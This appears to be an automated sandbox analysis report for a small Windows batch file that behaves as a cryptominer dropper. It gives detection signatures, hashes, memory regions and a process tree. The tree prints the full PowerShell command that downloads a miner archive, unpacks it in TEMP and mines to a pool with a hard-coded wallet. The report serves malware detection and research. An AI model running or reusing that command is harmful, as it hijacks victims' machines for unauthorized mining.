b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1795s
max time network
1798s
platform
windows10-1703_x64
resource
win10-20231220-de
resource tags

arch:x64arch:x86image:win10-20231220-delocale:de-deos:windows10-1703-x64systemwindows
submitted
03-02-2024 01:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1028	powershell.exe
4	1028	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1944	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1944	cpuminer-sse2.exe
1944	cpuminer-sse2.exe
1944	cpuminer-sse2.exe
1944	cpuminer-sse2.exe
1944	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1028	powershell.exe
1028	powershell.exe
1028	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 1028	2168	cmd.exe	75
PID 2168 wrote to memory of 1028	2168	cmd.exe	75
PID 1028 wrote to memory of 4540	1028	powershell.exe	76
PID 1028 wrote to memory of 4540	1028	powershell.exe	76
PID 4540 wrote to memory of 1944	4540	cmd.exe	78
PID 4540 wrote to memory of 1944	4540	cmd.exe	78

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1944

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5boiuchj.ypk.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
595KB

MD5
c526de9dac552eb9d4fb9decf1fca886

SHA1
bb0d5aed3af5242cbcdfa72d2f1c50b21b93ba3d

SHA256
cfca8d0b1c75c3a3368390d73897326fd78d6a952908c5319e9bbd702fec7550

SHA512
63c483dffaa1f27f18de97101113eba50d529841aba616649a87af80a25841c7f4c0973cc7f63b8c98a9e658541694277b2d11004bc91e4d967d30bb9f570d46

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
456KB

MD5
4e4eb364f365e322259d5f5c53b6b4b2

SHA1
c93b50fa165ce76385d29c9aab9f18c56d4c5b34

SHA256
b068b76ec567c90b49254bed5a390396d946c97173ec914afe1efabef290797e

SHA512
958856588229d674927eb73aee18e7f2e98de7fd88cde7db769a6c4b8cbb1b0e6e5e77e592b50b4f8e92480d5e5c7f956dc132ef262dbc32483b031a4e3ab1d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
563KB

MD5
1ae1b8043877649dde472d32250a045b

SHA1
12e303f19882d8b2c4f2a9af59fb31ddc8a77577

SHA256
13ed72b43199d54ea4c79bd91239167b8416b95f3123e557b49b4ca7831e7d93

SHA512
880acb2c6271b8befe5c525ea94af359fcc32d302c0410e3529e3c5fb0515ca138eba9c2ec2f8b9735a53bd8d379636a5bc0882778de7cbb986133bc018953b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
626KB

MD5
c9b469314ac39709008b5d35b40493c7

SHA1
b641d21def99f7a4a20037549b1f0a1140b98587

SHA256
8a285c9fa4543094050a18499467aed76b3cbb8fdad31dcf519b7c06a81b28ef

SHA512
404ee6e98a92fa933c8338c9d34041ccc90f1a26253ff5af9feb9fe372eee75bfe574c989286f463754850e16a976c049eb1fe18ca3f13acc9f3986a250a3ecc

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
553KB

MD5
5218fcc0f5c4d8f3c40547f5b5d8851c

SHA1
20dbee26c4b4581f8f502ca82085bb574f0db908

SHA256
9ac284007f41dc9cf54fdc955f704feb8337687b43a94f75b7d481efc86eca0c

SHA512
ab77d9cb731c7642eba8b32440cae21e777e9bacb93b5c84117ac2c301a5d45a88c9eb0bf387f5eeaac42350714120654e2fdd02c48fc2251ee16298f6a5e488

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
509KB

MD5
31c0a9db96c61fd09bf427f9d4310e90

SHA1
76e6de508fcf73da1dd1c581b419101017cf06c4

SHA256
cb868444435acdbd7c80c0bfa3b96350a3c2343886b136858e84ec4e774321eb

SHA512
516d7c7ac6bd60b8a5d043070ff2987cafe070ff96d251651b7f3960277a98010f61d5bd3272b3881a9bbd36be12113d8f01aaab88373aca69024aac358f59a8

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
592KB

MD5
64f92d7c22a916e54fb3fba128e59287

SHA1
5aafbf15369b61a8b23faf77dbd17ebb64d28523

SHA256
32294b6e7823ec2924468eef1f51cee84ec4a40e8b9af587d914c353193b735d

SHA512
dbb87452a7b17fc45bc124b8d60b824f1d488acb1017f2827d065c73d84400dc92021b514ddfd4764b09f253ea81b3bd4317ec565464cb0b74e245d9b305b2ce

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
338KB

MD5
79deb51a529f7f426b2f2017bb63d320

SHA1
8f69d7fea663601e060adbd9ffb7f0c938f5060c

SHA256
4ea6d9baa9e5582aed40448c7abb022cd82fecc67afa32c490dd2652df0d1737

SHA512
56d9743f9844c3a2de3ae8a818a71482e9eadf5f498691bcc9d6dce96d29a204d9fb1a4c1dd32239a70a4eeed02d464b8f85823491eef8dba1fa5c54f18f6ee2

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
549KB

MD5
bf2e79e2838a7c13c4283fc89fe87854

SHA1
978525780e573c792469d5a4a8bed3da6017fa46

SHA256
be21275a05bdc777d27bda4036599f5644b2e9c2ecbf005e4345f8665cde97f3

SHA512
c5f0522354840b7e2d8c4db02bb253d0cf68ab2a529eeb77183fd73293a7cc215589580da2dae14b4a9efe26bff44c83e7d557808601fb6e16066fac371c6f27

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
521KB

MD5
e525f7b941cb5d31c09ab68026d5e105

SHA1
30fe17fdbfff1b9a5bb39bee3c323c86a97f6cf1

SHA256
ec036b9fb9ff45e1772295b3149a65ce7873eff3eca30659f43673c5c33b8faa

SHA512
0669d96592365b12a110cb9b3c584cb147b599d6d0fd41419fcd0eeb8521423b837e195972a3b1798cbd2ac1fa1461ba7020d1ae904eb800dc87fdfcc5a5818a

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
406KB

MD5
74e320b9e89abf13f5bcf2efd6b215b4

SHA1
1b88f5b041844b3113a268f095deed5984390eb6

SHA256
dac95ba7c13778ccbcb0933cc4ad6f4116f0ddfa6f4bda641a43ad7bef4cf711

SHA512
c094f120934ee4ed9031129cc484c798ed110e2a494bc952ae96a4c58c05219c6d47147efe690cef5d1bb5facecd5f641d3591cad1637427e62e206215dfb50b

Download Submit
memory/1028-33-0x00007FF9DFFD0000-0x00007FF9E09BC000-memory.dmp

Filesize
9.9MB

Download
memory/1028-54-0x000001C972C80000-0x000001C972C92000-memory.dmp

Filesize
72KB

Download
memory/1028-67-0x000001C9725B0000-0x000001C9725BA000-memory.dmp

Filesize
40KB

Download
memory/1028-111-0x00007FF9DFFD0000-0x00007FF9E09BC000-memory.dmp

Filesize
9.9MB

Download
memory/1028-34-0x000001C9725C0000-0x000001C9725D0000-memory.dmp

Filesize
64KB

Download
memory/1028-5-0x000001C972520000-0x000001C972530000-memory.dmp

Filesize
64KB

Download
memory/1028-31-0x000001C9729E0000-0x000001C9729F6000-memory.dmp

Filesize
88KB

Download
memory/1028-28-0x000001C9725C0000-0x000001C9725D0000-memory.dmp

Filesize
64KB

Download
memory/1028-13-0x000001C972A00000-0x000001C972A76000-memory.dmp

Filesize
472KB

Download
memory/1028-9-0x000001C9725C0000-0x000001C9725D0000-memory.dmp

Filesize
64KB

Download
memory/1028-10-0x000001C972870000-0x000001C972974000-memory.dmp

Filesize
1.0MB

Download
memory/1028-7-0x000001C9725C0000-0x000001C9725D0000-memory.dmp

Filesize
64KB

Download
memory/1028-8-0x000001C972560000-0x000001C972582000-memory.dmp

Filesize
136KB

Download
memory/1028-6-0x00007FF9DFFD0000-0x00007FF9E09BC000-memory.dmp

Filesize
9.9MB

Download
memory/1028-4-0x000001C9725D0000-0x000001C972656000-memory.dmp

Filesize
536KB

Download
memory/1944-124-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-125-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1944-126-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1944-127-0x0000000052110000-0x00000000521A8000-memory.dmp

Filesize
608KB

Download
memory/1944-128-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/1944-129-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-139-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-142-0x0000000052110000-0x00000000521A8000-memory.dmp

Filesize
608KB

Download
memory/1944-149-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-154-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-157-0x0000000052110000-0x00000000521A8000-memory.dmp

Filesize
608KB

Download
memory/1944-164-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-169-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-172-0x0000000052110000-0x00000000521A8000-memory.dmp

Filesize
608KB

Download
memory/1944-179-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-184-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1944-187-0x0000000052110000-0x00000000521A8000-memory.dmp

Filesize
608KB

Download